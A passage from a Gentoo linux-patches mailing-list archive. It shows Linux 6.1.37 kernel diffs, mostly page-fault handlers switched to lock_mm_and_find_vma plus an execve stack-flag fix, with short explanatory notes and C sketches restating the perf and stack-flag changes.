++			enable ? "connect" : "disconnect", ret);
++}
++
+ int acpi_pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&dev->dev);
+@@ -1053,32 +1063,49 @@ int acpi_pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		[PCI_D3hot] = ACPI_STATE_D3_HOT,
+ 		[PCI_D3cold] = ACPI_STATE_D3_COLD,
+ 	};
+-	int error = -EINVAL;
++	int error;
+ 
+ 	/* If the ACPI device has _EJ0, ignore the device */
+ 	if (!adev || acpi_has_method(adev->handle, "_EJ0"))
+ 		return -ENODEV;
+ 
+ 	switch (state) {
+-	case PCI_D3cold:
+-		if (dev_pm_qos_flags(&dev->dev, PM_QOS_FLAG_NO_POWER_OFF) ==
+-				PM_QOS_FLAGS_ALL) {
+-			error = -EBUSY;
+-			break;
+-		}
+-		fallthrough;
+ 	case PCI_D0:
+ 	case PCI_D1:
+ 	case PCI_D2:
+ 	case PCI_D3hot:
+-		error = acpi_device_set_power(adev, state_conv[state]);
++	case PCI_D3cold:
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	if (state == PCI_D3cold) {
++		if (dev_pm_qos_flags(&dev->dev, PM_QOS_FLAG_NO_POWER_OFF) ==
++				PM_QOS_FLAGS_ALL)
++			return -EBUSY;
++
++		/* Notify AML lack of PCI config space availability */
++		acpi_pci_config_space_access(dev, false);
+ 	}
+ 
+-	if (!error)
+-		pci_dbg(dev, "power state changed by ACPI to %s\n",
+-		        acpi_power_state_string(adev->power.state));
++	error = acpi_device_set_power(adev, state_conv[state]);
++	if (error)
++		return error;
+ 
+-	return error;
++	pci_dbg(dev, "power state changed by ACPI to %s\n",
++	        acpi_power_state_string(adev->power.state));
++
++	/*
++	 * Notify AML of PCI config space availability.  Config space is
++	 * accessible in all states except D3cold; the only transitions
++	 * that change availability are transitions to D3cold and from
++	 * D3cold to D0.
++	 */
++	if (state == PCI_D0)
++		acpi_pci_config_space_access(dev, true);
++
++	return 0;
+ }
+ 
+ pci_power_t acpi_pci_get_power_state(struct pci_dev *dev)
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index f5b6ef943ede2..b8ed44f401b58 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
+ #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
+ 
+ /* Bits set in the VMA until the stack is in its final location */
+-#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
++#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
+ 
+ #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
+ 
+@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+ #define VM_STACK	VM_GROWSUP
++#define VM_STACK_EARLY	VM_GROWSDOWN
+ #else
+ #define VM_STACK	VM_GROWSDOWN
++#define VM_STACK_EARLY	0
+ #endif
+ 
+ #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
+diff --git a/mm/nommu.c b/mm/nommu.c
+index da26b3fec9ebe..8e8fe491d914a 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -688,8 +688,13 @@ EXPORT_SYMBOL(find_vma);
+ struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
+ 			unsigned long addr, struct pt_regs *regs)
+ {
++	struct vm_area_struct *vma;
++
+ 	mmap_read_lock(mm);
+-	return vma_lookup(mm, addr);
++	vma = vma_lookup(mm, addr);
++	if (!vma)
++		mmap_read_unlock(mm);
++	return vma;
+ }
+ 
+ /*
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index 0d045182c08c0..f23b9b7ed0159 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -25,6 +25,13 @@ else
+ 	tree=${srctree}/
+ fi
+ 
++# gtags(1) refuses to index any file outside of its current working dir.
++# If gtags indexing is requested and the build output directory is not
++# the kernel source tree, index all files in absolute-path form.
++if [[ "$1" == "gtags" && -n "${tree}" ]]; then
++	tree=$(realpath "$tree")/
++fi
++
+ # Detect if ALLSOURCE_ARCHS is set. If not, we assume SRCARCH
+ if [ "${ALLSOURCE_ARCHS}" = "" ]; then
+ 	ALLSOURCE_ARCHS=${SRCARCH}
+@@ -124,7 +131,7 @@ docscope()
+ 
+ dogtags()
+ {
+-	all_target_sources | gtags -i -f -
++	all_target_sources | gtags -i -C "${tree:-.}" -f - "$PWD"
+ }
+ 
+ # Basic regular expressions with an optional /kind-spec/ for ctags and
+diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c
+index a3a165ae933ad..98014f9375686 100644
+--- a/tools/perf/util/symbol.c
++++ b/tools/perf/util/symbol.c
+@@ -1368,10 +1368,23 @@ static int dso__load_kcore(struct dso *dso, struct map *map,
+ 
+ 	/* Find the kernel map using the '_stext' symbol */
+ 	if (!kallsyms__get_function_start(kallsyms_filename, "_stext", &stext)) {
++		u64 replacement_size = 0;
++
+ 		list_for_each_entry(new_map, &md.maps, node) {
+-			if (stext >= new_map->start && stext < new_map->end) {
++			u64 new_size = new_map->end - new_map->start;
++
++			if (!(stext >= new_map->start && stext < new_map->end))
++				continue;
++
++			/*
++			 * On some architectures, ARM64 for example, the kernel
++			 * text can get allocated inside of the vmalloc segment.
++			 * Select the smallest matching segment, in case stext
++			 * falls within more than one in the list.
++			 */
++			if (!replacement_map || new_size < replacement_size) {
+ 				replacement_map = new_map;
+-				break;
++				replacement_size = new_size;
+ 			}
+ 		}
+ 	}


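A note on the tools/perf hunk that closes the diff above: dso__load_kcore() previously took the first kcore map containing _stext, which mis-resolves the kernel map on arm64, where the kernel text can sit inside the much larger vmalloc segment. The patch switches to preferring the smallest containing map. The stand-alone C sketch below restates that selection rule outside the perf code base; struct kmap and pick_text_map() are illustrative names invented here, not symbols from tools/perf.

/* Stand-alone restatement of the selection rule above; not perf code. */
#include <stdint.h>
#include <stddef.h>

struct kmap {				/* simplified stand-in for perf's struct map */
	uint64_t start;
	uint64_t end;
};

static const struct kmap *pick_text_map(const struct kmap *maps, size_t nr,
					uint64_t stext)
{
	const struct kmap *best = NULL;
	uint64_t best_size = 0;

	for (size_t i = 0; i < nr; i++) {
		uint64_t size = maps[i].end - maps[i].start;

		/* skip maps that do not contain _stext at all */
		if (stext < maps[i].start || stext >= maps[i].end)
			continue;

		/* keep the smallest containing map, as the patch does */
		if (!best || size < best_size) {
			best = &maps[i];
			best_size = size;
		}
	}
	return best;			/* NULL when no map contains _stext */
}

Fed one map for the whole vmalloc segment and one for the real text segment, both containing _stext, this returns the text segment because it is the smaller of the two.
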
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-04 13:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-04 13:15 UTC (permalink / raw
  To: gentoo-commits

commit:     603da5b7208c6a4e92fdc62538021f1c3d5c7539
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Jul  4 13:15:15 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Jul  4 13:15:15 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=603da5b7

mm: disable CONFIG_PER_VMA_LOCK by default until it's fixed

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                     |  4 ++
 1800_mm-execve-mark-stack-as-growing-down.patch | 82 +++++++++++++++++++++++++
 2 files changed, 86 insertions(+)

diff --git a/0000_README b/0000_README
index d50ba74b..0d9f0d0b 100644
--- a/0000_README
+++ b/0000_README
@@ -203,6 +203,10 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
+Patch:  1800_mm-execve-mark-stack-as-growing-down.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
+Desc:   execve: always mark stack as growing down during early stack setup
+
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_mm-execve-mark-stack-as-growing-down.patch b/1800_mm-execve-mark-stack-as-growing-down.patch
new file mode 100644
index 00000000..7c71f7ea
--- /dev/null
+++ b/1800_mm-execve-mark-stack-as-growing-down.patch
@@ -0,0 +1,82 @@
+From 0140eae44accd0df8071de6487afe0921eb0d7fd Mon Sep 17 00:00:00 2001
+From: Linus Torvalds <torvalds@linux-foundation.org>
+Date: Sun, 2 Jul 2023 23:20:17 -0700
+Subject: execve: always mark stack as growing down during early stack setup
+
+commit f66066bc5136f25e36a2daff4896c768f18c211e upstream.
+
+While our user stacks can grow either down (all common architectures) or
+up (parisc and the ia64 register stack), the initial stack setup when we
+copy the argument and environment strings to the new stack at execve()
+time is always done by extending the stack downwards.
+
+But it turns out that in commit 8d7071af8907 ("mm: always expand the
+stack with the mmap write lock held"), as part of making the stack
+growing code more robust, 'expand_downwards()' was now made to actually
+check the vma flags:
+
+	if (!(vma->vm_flags & VM_GROWSDOWN))
+		return -EFAULT;
+
+and that meant that this execve-time stack expansion started failing on
+parisc, because on that architecture, the stack flags do not contain the
+VM_GROWSDOWN bit.
+
+At the same time the new check in expand_downwards() is clearly correct,
+and simplified the callers, so let's not remove it.
+
+The solution is instead to just codify the fact that yes, during
+execve(), the stack grows down.  This not only matches reality, it ends
+up being particularly simple: we already have special execve-time flags
+for the stack (VM_STACK_INCOMPLETE_SETUP) and use those flags to avoid
+page migration during this setup time (see vma_is_temporary_stack() and
+invalid_migration_vma()).
+
+So just add VM_GROWSDOWN to that set of temporary flags, and now our
+stack flags automatically match reality, and the parisc stack expansion
+works again.
+
+Note that the VM_STACK_INCOMPLETE_SETUP bits will be cleared when the
+stack is finalized, so we only add the extra VM_GROWSDOWN bit on
+CONFIG_STACK_GROWSUP architectures (ie parisc) rather than adding it in
+general.
+
+Link: https://lore.kernel.org/all/612eaa53-6904-6e16-67fc-394f4faa0e16@bell.net/
+Link: https://lore.kernel.org/all/5fd98a09-4792-1433-752d-029ae3545168@gmx.de/
+Fixes: 8d7071af8907 ("mm: always expand the stack with the mmap write lock held")
+Reported-by: John David Anglin <dave.anglin@bell.net>
+Reported-and-tested-by: Helge Deller <deller@gmx.de>
+Reported-and-tested-by: Guenter Roeck <linux@roeck-us.net>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
+---
+ include/linux/mm.h | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index f5b6ef943ede2..b8ed44f401b58 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
+ #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
+ 
+ /* Bits set in the VMA until the stack is in its final location */
+-#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
++#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
+ 
+ #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
+ 
+@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+ #define VM_STACK	VM_GROWSUP
++#define VM_STACK_EARLY	VM_GROWSDOWN
+ #else
+ #define VM_STACK	VM_GROWSDOWN
++#define VM_STACK_EARLY	0
+ #endif
+ 
+ #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
+-- 
+cgit 
+


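The flag arithmetic in the patch above is compact enough to get lost in the diff: on CONFIG_STACK_GROWSUP architectures (parisc), the temporary execve()-time stack VMA now also carries VM_GROWSDOWN via VM_STACK_EARLY, so the expand_downwards() check passes during early stack setup, and the bit disappears again when the VM_STACK_INCOMPLETE_SETUP bits are cleared. A minimal sketch follows, with made-up bit values; only the set/clear relationships mirror include/linux/mm.h.

#include <stdio.h>

/* invented values for illustration; the kernel's actual bits differ */
#define VM_GROWSDOWN	0x0100u
#define VM_GROWSUP	0x0200u
#define VM_RAND_READ	0x0010u
#define VM_SEQ_READ	0x0020u

/* the CONFIG_STACK_GROWSUP (parisc) side of the patched #ifdef */
#define VM_STACK		VM_GROWSUP
#define VM_STACK_EARLY		VM_GROWSDOWN
#define VM_STACK_INCOMPLETE_SETUP \
	(VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)

int main(void)
{
	/* execve() marks the not-yet-final stack VMA: */
	unsigned int vm_flags = VM_STACK | VM_STACK_INCOMPLETE_SETUP;

	/* expand_downwards()'s VM_GROWSDOWN check passes during setup */
	printf("early:     VM_GROWSDOWN %s\n",
	       vm_flags & VM_GROWSDOWN ? "set" : "clear");

	/* once the stack is in its final location the temporary
	 * bits are dropped and only VM_GROWSUP remains */
	vm_flags &= ~VM_STACK_INCOMPLETE_SETUP;
	printf("finalized: VM_GROWSDOWN %s\n",
	       vm_flags & VM_GROWSDOWN ? "set" : "clear");
	return 0;
}

Compiled and run, this prints "set" then "clear", which is the point of the fix: VM_GROWSDOWN exists on the grows-up stack only while VM_STACK_INCOMPLETE_SETUP is in place.
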
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-01 18:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-01 18:27 UTC (permalink / raw
  To: gentoo-commits

commit:     bee1a172fdd848464d7ea0df4de48778e3243e3c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jul  1 18:27:25 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jul  1 18:27:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bee1a172

Linux patch 6.1.37-gentoo

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1036_linux-6.1.37.patch | 2681 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2685 insertions(+)

diff --git a/0000_README b/0000_README
index 46c23470..d50ba74b 100644
--- a/0000_README
+++ b/0000_README
@@ -187,6 +187,10 @@ Patch:  1035_linux-6.1.36.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.36
 
+Patch:  1036_linux-6.1.37.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.37
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1036_linux-6.1.37.patch b/1036_linux-6.1.37.patch
new file mode 100644
index 00000000..62552bde
--- /dev/null
+++ b/1036_linux-6.1.37.patch
@@ -0,0 +1,2681 @@
+diff --git a/Makefile b/Makefile
+index cffb83d7a0fb6..26d73ce7e9267 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 36
++SUBLEVEL = 37
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/Kconfig b/arch/alpha/Kconfig
+index 97fce7386b002..d95d82abdf295 100644
+--- a/arch/alpha/Kconfig
++++ b/arch/alpha/Kconfig
+@@ -28,6 +28,7 @@ config ALPHA
+ 	select GENERIC_SMP_IDLE_THREAD
+ 	select HAVE_ARCH_AUDITSYSCALL
+ 	select HAVE_MOD_ARCH_SPECIFIC
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select ODD_RT_SIGACTION
+ 	select OLD_SIGSUSPEND
+diff --git a/arch/alpha/mm/fault.c b/arch/alpha/mm/fault.c
+index ef427a6bdd1ab..2b49aa94e4de3 100644
+--- a/arch/alpha/mm/fault.c
++++ b/arch/alpha/mm/fault.c
+@@ -119,20 +119,12 @@ do_page_fault(unsigned long address, unsigned long mmcsr,
+ 		flags |= FAULT_FLAG_USER;
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 
+ 	/* Ok, we have a good vm_area for this memory access, so
+ 	   we can handle it.  */
+- good_area:
+ 	si_code = SEGV_ACCERR;
+ 	if (cause < 0) {
+ 		if (!(vma->vm_flags & VM_EXEC))
+@@ -189,6 +181,7 @@ retry:
+  bad_area:
+ 	mmap_read_unlock(mm);
+ 
++ bad_area_nosemaphore:
+ 	if (user_mode(regs))
+ 		goto do_sigsegv;
+ 
+diff --git a/arch/arc/Kconfig b/arch/arc/Kconfig
+index d9a13ccf89a3a..cb1074f74c3f1 100644
+--- a/arch/arc/Kconfig
++++ b/arch/arc/Kconfig
+@@ -41,6 +41,7 @@ config ARC
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select OF
+ 	select OF_EARLY_FLATTREE
+diff --git a/arch/arc/mm/fault.c b/arch/arc/mm/fault.c
+index 5ca59a482632a..f59e722d147f9 100644
+--- a/arch/arc/mm/fault.c
++++ b/arch/arc/mm/fault.c
+@@ -113,15 +113,9 @@ void do_page_fault(unsigned long address, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (unlikely(address < vma->vm_start)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN) || expand_stack(vma, address))
+-			goto bad_area;
+-	}
++		goto bad_area_nosemaphore;
+ 
+ 	/*
+ 	 * vm_area is good, now check permissions for this memory access
+@@ -161,6 +155,7 @@ retry:
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	/*
+ 	 * Major/minor page fault accounting
+ 	 * (in case of retry we only land here once)
+diff --git a/arch/arm/Kconfig b/arch/arm/Kconfig
+index a08c9d092a332..0202e48e7a207 100644
+--- a/arch/arm/Kconfig
++++ b/arch/arm/Kconfig
+@@ -122,6 +122,7 @@ config ARM
+ 	select HAVE_UID16
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_REL
+ 	select NEED_DMA_MAP_STATE
+ 	select OF_EARLY_FLATTREE if OF
+diff --git a/arch/arm/mm/fault.c b/arch/arm/mm/fault.c
+index de988cba9a4b1..b0db853103317 100644
+--- a/arch/arm/mm/fault.c
++++ b/arch/arm/mm/fault.c
+@@ -231,37 +231,11 @@ static inline bool is_permission_fault(unsigned int fsr)
+ 	return false;
+ }
+ 
+-static vm_fault_t __kprobes
+-__do_page_fault(struct mm_struct *mm, unsigned long addr, unsigned int flags,
+-		unsigned long vma_flags, struct pt_regs *regs)
+-{
+-	struct vm_area_struct *vma = find_vma(mm, addr);
+-	if (unlikely(!vma))
+-		return VM_FAULT_BADMAP;
+-
+-	if (unlikely(vma->vm_start > addr)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			return VM_FAULT_BADMAP;
+-		if (addr < FIRST_USER_ADDRESS)
+-			return VM_FAULT_BADMAP;
+-		if (expand_stack(vma, addr))
+-			return VM_FAULT_BADMAP;
+-	}
+-
+-	/*
+-	 * ok, we have a good vm_area for this memory access, check the
+-	 * permissions on the VMA allow for the fault which occurred.
+-	 */
+-	if (!(vma->vm_flags & vma_flags))
+-		return VM_FAULT_BADACCESS;
+-
+-	return handle_mm_fault(vma, addr & PAGE_MASK, flags, regs);
+-}
+-
+ static int __kprobes
+ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma;
+ 	int sig, code;
+ 	vm_fault_t fault;
+ 	unsigned int flags = FAULT_FLAG_DEFAULT;
+@@ -300,31 +274,21 @@ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+-	/*
+-	 * As per x86, we may deadlock here.  However, since the kernel only
+-	 * validly references user space from well defined areas of the code,
+-	 * we can bug out early if this is from code which shouldn't.
+-	 */
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ARM_pc))
+-			goto no_context;
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case, we'll have missed the might_sleep() from
+-		 * down_read()
+-		 */
+-		might_sleep();
+-#ifdef CONFIG_DEBUG_VM
+-		if (!user_mode(regs) &&
+-		    !search_exception_tables(regs->ARM_pc))
+-			goto no_context;
+-#endif
++	vma = lock_mm_and_find_vma(mm, addr, regs);
++	if (unlikely(!vma)) {
++		fault = VM_FAULT_BADMAP;
++		goto bad_area;
+ 	}
+ 
+-	fault = __do_page_fault(mm, addr, flags, vm_flags, regs);
++	/*
++	 * ok, we have a good vm_area for this memory access, check the
++	 * permissions on the VMA allow for the fault which occurred.
++	 */
++	if (!(vma->vm_flags & vm_flags))
++		fault = VM_FAULT_BADACCESS;
++	else
++		fault = handle_mm_fault(vma, addr & PAGE_MASK, flags, regs);
+ 
+ 	/* If we need to retry but a fatal signal is pending, handle the
+ 	 * signal first. We do not need to release the mmap_lock because
+@@ -355,6 +319,7 @@ retry:
+ 	if (likely(!(fault & (VM_FAULT_ERROR | VM_FAULT_BADMAP | VM_FAULT_BADACCESS))))
+ 		return 0;
+ 
++bad_area:
+ 	/*
+ 	 * If we are in kernel mode at this point, we
+ 	 * have no context to handle this fault with.
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 43ff7c7a3ac97..20ee745c118ae 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -211,6 +211,7 @@ config ARM64
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
+ 	select KASAN_VMALLOC if KASAN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select NEED_DMA_MAP_STATE
+ 	select NEED_SG_DMA_LENGTH
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 2fef1fa93e7b6..6b6b8a82f2941 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -483,27 +483,14 @@ static void do_bad_area(unsigned long far, unsigned long esr,
+ #define VM_FAULT_BADMAP		((__force vm_fault_t)0x010000)
+ #define VM_FAULT_BADACCESS	((__force vm_fault_t)0x020000)
+ 
+-static vm_fault_t __do_page_fault(struct mm_struct *mm, unsigned long addr,
++static vm_fault_t __do_page_fault(struct mm_struct *mm,
++				  struct vm_area_struct *vma, unsigned long addr,
+ 				  unsigned int mm_flags, unsigned long vm_flags,
+ 				  struct pt_regs *regs)
+ {
+-	struct vm_area_struct *vma = find_vma(mm, addr);
+-
+-	if (unlikely(!vma))
+-		return VM_FAULT_BADMAP;
+-
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so we can handle
+ 	 * it.
+-	 */
+-	if (unlikely(vma->vm_start > addr)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			return VM_FAULT_BADMAP;
+-		if (expand_stack(vma, addr))
+-			return VM_FAULT_BADMAP;
+-	}
+-
+-	/*
+ 	 * Check that the permissions on the VMA allow for the fault which
+ 	 * occurred.
+ 	 */
+@@ -535,6 +522,7 @@ static int __kprobes do_page_fault(unsigned long far, unsigned long esr,
+ 	unsigned long vm_flags;
+ 	unsigned int mm_flags = FAULT_FLAG_DEFAULT;
+ 	unsigned long addr = untagged_addr(far);
++	struct vm_area_struct *vma;
+ 
+ 	if (kprobe_page_fault(regs, esr))
+ 		return 0;
+@@ -585,31 +573,14 @@ static int __kprobes do_page_fault(unsigned long far, unsigned long esr,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+-	/*
+-	 * As per x86, we may deadlock here. However, since the kernel only
+-	 * validly references user space from well defined areas of the code,
+-	 * we can bug out early if this is from code which shouldn't.
+-	 */
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->pc))
+-			goto no_context;
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above mmap_read_trylock() might have succeeded in which
+-		 * case, we'll have missed the might_sleep() from down_read().
+-		 */
+-		might_sleep();
+-#ifdef CONFIG_DEBUG_VM
+-		if (!user_mode(regs) && !search_exception_tables(regs->pc)) {
+-			mmap_read_unlock(mm);
+-			goto no_context;
+-		}
+-#endif
++	vma = lock_mm_and_find_vma(mm, addr, regs);
++	if (unlikely(!vma)) {
++		fault = VM_FAULT_BADMAP;
++		goto done;
+ 	}
+ 
+-	fault = __do_page_fault(mm, addr, mm_flags, vm_flags, regs);
++	fault = __do_page_fault(mm, vma, addr, mm_flags, vm_flags, regs);
+ 
+ 	/* Quick path to respond to signals */
+ 	if (fault_signal_pending(fault, regs)) {
+@@ -628,6 +599,7 @@ retry:
+ 	}
+ 	mmap_read_unlock(mm);
+ 
++done:
+ 	/*
+ 	 * Handle the "normal" (no error) case first.
+ 	 */
+diff --git a/arch/csky/Kconfig b/arch/csky/Kconfig
+index adee6ab36862e..742009123fd5a 100644
+--- a/arch/csky/Kconfig
++++ b/arch/csky/Kconfig
+@@ -96,6 +96,7 @@ config CSKY
+ 	select HAVE_RSEQ
+ 	select HAVE_STACKPROTECTOR
+ 	select HAVE_SYSCALL_TRACEPOINTS
++	select LOCK_MM_AND_FIND_VMA
+ 	select MAY_HAVE_SPARSE_IRQ
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select OF
+diff --git a/arch/csky/mm/fault.c b/arch/csky/mm/fault.c
+index e15f736cca4b4..a885518ce1dd2 100644
+--- a/arch/csky/mm/fault.c
++++ b/arch/csky/mm/fault.c
+@@ -97,13 +97,12 @@ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_f
+ 	BUG();
+ }
+ 
+-static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
++static inline void bad_area_nosemaphore(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
+ {
+ 	/*
+ 	 * Something tried to access memory that isn't in our memory map.
+ 	 * Fix it, but check if it's kernel or user first.
+ 	 */
+-	mmap_read_unlock(mm);
+ 	/* User mode accesses just cause a SIGSEGV */
+ 	if (user_mode(regs)) {
+ 		do_trap(regs, SIGSEGV, code, addr);
+@@ -238,20 +237,9 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (is_write(regs))
+ 		flags |= FAULT_FLAG_WRITE;
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, addr);
++	vma = lock_mm_and_find_vma(mm, addr, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= addr))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, addr))) {
+-		bad_area(regs, mm, code, addr);
++		bad_area_nosemaphore(regs, mm, code, addr);
+ 		return;
+ 	}
+ 
+@@ -259,11 +247,11 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it.
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (unlikely(access_error(regs, vma))) {
+-		bad_area(regs, mm, code, addr);
++		mmap_read_unlock(mm);
++		bad_area_nosemaphore(regs, mm, code, addr);
+ 		return;
+ 	}
+ 
+diff --git a/arch/hexagon/Kconfig b/arch/hexagon/Kconfig
+index 54eadf2651786..6726f4941015f 100644
+--- a/arch/hexagon/Kconfig
++++ b/arch/hexagon/Kconfig
+@@ -28,6 +28,7 @@ config HEXAGON
+ 	select GENERIC_SMP_IDLE_THREAD
+ 	select STACKTRACE_SUPPORT
+ 	select GENERIC_CLOCKEVENTS_BROADCAST
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select GENERIC_CPU_DEVICES
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+diff --git a/arch/hexagon/mm/vm_fault.c b/arch/hexagon/mm/vm_fault.c
+index f73c7cbfe3260..583b087271667 100644
+--- a/arch/hexagon/mm/vm_fault.c
